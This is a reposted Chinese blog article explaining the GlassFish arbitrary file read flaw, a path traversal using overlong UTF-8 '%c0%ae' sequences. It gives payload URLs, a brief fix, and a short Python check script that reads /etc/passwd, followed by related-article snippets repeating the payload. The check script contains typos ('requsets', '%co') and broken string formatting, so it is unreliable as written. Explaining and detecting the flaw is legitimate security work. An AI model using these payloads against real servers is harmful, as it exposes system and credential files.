glassfish任意文件读取漏洞解析

最新推荐文章于 2024-08-18 17:26:07 发布
最新推荐文章于 2024-08-18 17:26:07 发布
阅读量558 收藏
点赞数
文章标签: java
原文链接:http://www.cnblogs.com/KevinGeorge/p/8254528.html
版权

一、背景:

glassfish是一款java编写的跨平台的开源的应用服务器。

二、漏洞原理:

与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造:

http://ip:port/theme/META-INF/%c0%ae%co%ae/%c0%ae%co%ae/xxxpath/xxxfile

上述利用可以变形:

http://ip:port/theme/META-INF/%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./xxxpath/xxxfile

三、修复方案:

过滤掉. /等关键输入即可。

四、检查部分关键代码:

1 #glassfish any files readable vuln:
2 import requests
3 def check(ip,port):
4     url = "http://%s:%s/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
5     response = requsets.get(url)
6     if response.status_code == 200:
7         print "Vuln"

 

转载于:https://www.cnblogs.com/KevinGeorge/p/8254528.html

weixin_30449453
关注
漏洞复现----11、GlassFish任意文件读取
七天
11-10 3132
文章目录一、Glassfish简介二、漏洞简介 一、Glassfish简介 GlassFish是一款java编写的跨平台的开源的应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。Glassfish是Oracle 开发的官方Java EE容器,也是同时支持Servlet和EJB,支持最新的特性,有自己的web容器,支持集群,支持热部署。 二、漏洞简介 GlassFish容器解析java语言中的特殊字符导致漏洞的产生。此漏洞严格来说是Glassf
glassfish任意文件读取漏洞
剁椒鱼头没剁椒的博客
01-27 1263
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。
GlassFish 任意文件读取漏洞
weixin_51387754的博客
11-26 1248
漏洞简介 glassfish是一款java编写的跨平台的开源的应用服务器。 java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。 漏洞复现 这里使用4.1.0版本 使用vulhub cd /vulhub/glassfish/4.1.0 (root????guiltyfet)-[/home/guiltyfet/vulhub/glassfish/4.
glassfish任意文件读取漏洞-漏洞复现
m0_66376444的博客
04-15 369
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。GlassFish漏洞成因:java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。执行POC进行任意文件读取linux下的/etc/passwd或者windows下的win.ini,成功读取。domains/domain1/config/domain.xml 各种数据库密码位置。三、GlassFish的敏感目录。
glassfish任意文件读取漏洞(4.0/4.1)
3569
03-28 1917
相关厂商:glassfish漏洞编号:wooyun-2010-0144595漏洞详情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0...
0x01 GlassFish 任意文件读取漏洞复现
最新发布
weixin_43263566的博客
08-18 433
之后就可以手动访问脚本验证的url看是否存在文件读取漏洞
中间件安全之GlassFish
qq_46085232的博客
05-12 348
中间件安全GlassFish任意文件读取漏洞危害 GlassFish GlassFish 是用于构建 Java EE 5 应用服务器的开源开发项目的名称。它基于 Sun Microsystems 提供的 Sun Java System Application Server PE 9 的源代码 以及 Oracle 贡献的 TopLink 持久性代码。该项目提供了开发高质量应用服务器的结构化过程,以前所未有的速度提供新的功能。 默认端口: 8080(Web 应用端口,即网站内容), 4848 ( GlassFi
常见端口漏洞及利用方式
7Riven's blog
11-09 6620
序号 软件/服务名称 端口 类型 可能存在的漏洞/利用方式 1 Apache 80/8080 中间件 解析漏洞 目录遍历 任意文件上传 2 Apache Group ActiveMQ 8161 中间件 远程代码执行 3 Docker 2375 中...
Web中间件常见安全漏洞
KHOST的博客
03-19 8339
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
漏洞复现 Oracle GlassFish Server 任意文件读取漏洞(CVE-2017-1000028)
nnn2188185的博客
04-16 1157
Oracle GlassFish Server Open Source Edition 4.1版本中存在任意文件读取漏洞。攻击者可借助特制的HTTP GET请求利用该漏洞访问敏感数据。 CVE-2017-1000028 CNNVD-201707-831 CNVD-2017-27302
深入浅出带你学习GlassFish中间件漏洞/深入浅出带你学习GlassFish中间件漏洞-详细白帽子指南
2401_84915584的博客
05-20 967
本文正在参加「金石计划 . 瓜分6万现金大奖」前文上文给大家带来了常见的漏洞不知道大家理解了没有,今天给大家带来一个新的中间件漏洞的讲解——
java glassfish漏洞_Oracle Java GlassFish Enterprise Server组件信息泄露漏洞
weixin_39676979的博客
02-26 177
发布日期:2012-06-13更新日期:2012-06-14受影响系统:Oracle GlassFish Enterprise Server 3.1.1描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-0551Oracle GlassFish Ser...
深入浅出带你学习GlassFish中间件漏洞
老司机的后备箱
02-16 920
今天总结了一下GLASSFISH中间件的常见的攻击漏洞的利用手法,不知道大家有没有学会,可以看到GLASSFISH中间件由于解析特性的原因都可能存在漏洞,同时也有类似于WEBLOGIC部署WAR包的漏洞,还是值得我们认真学习一下的,如果喜欢本文希望可以一键三连支持一下。整理了一套《前端大厂面试宝典》,包含了HTML、CSS、JavaScript、HTTP、TCP协议、浏览器、VUE、React、数据结构和算法,一共201道面试题,并对每个问题作出了回答和解析
GlassFish漏洞总结复现
1ance's blog
11-14 6489
写在前面:本文为漏洞复现系列GlassFish篇,复现的漏洞已vulhub中存在的环境为主。 欢迎大家点赞收藏,点点关注更好了hhhhhh 文章目录简介GlassFish 任意文件读取(CVE-2017-1000028)漏洞原理影响范围漏洞复现修复建议GlassFish 后台Getshell漏洞原理影响范围漏洞复现修复建议总结 简介 GlassFish 是用于构建 Java EE 5应用服务器的开源开发项目的名称。它基于 Sun Microsystems 提供的 Sun Java System Appli
vulhub漏洞复现21_GlassFish
weixin_44193247的博客
01-30 945
vulhub漏洞复现练习篇
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现
jennycisp的博客
11-01 282
中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等1、中间件-Weblogic安全2、中间件-JBoos安全3、中间件-Jenkins安全4、中间件-GlassFish安全常见中间件的安全测试:1、配置不当-解析&弱口令。
服务攻防之中间件GlassFish(总)
技术超强的网络安全平台
12-06 625
系列文章专辑:渗透测试之地基篇简介渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!一、前言中间件是介于应用系统和系统软件之间的一类
11.关于GlassFish说法正确的是 ( 2分) 口A. GlassFish任意文件读取漏洞(CVE 2017-1000028)受影响版本为<=4.1.2版本 口B.默认端口: 8080 (Web应用端口,即网站内容) 口C.默认端口: 4848 (GlassFish管理中心) 口D. GlassFish存在漏洞即可getshell
06-06
GlassFish任意文件读取漏洞(CVE-2017-1000028)受影响版本为版本,这个说法也是正确的。 D. GlassFish存在漏洞并不一定能够getshell,这个说法是错误的。虽然GlassFish存在漏洞可能会被攻击者利用,但是否能够...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值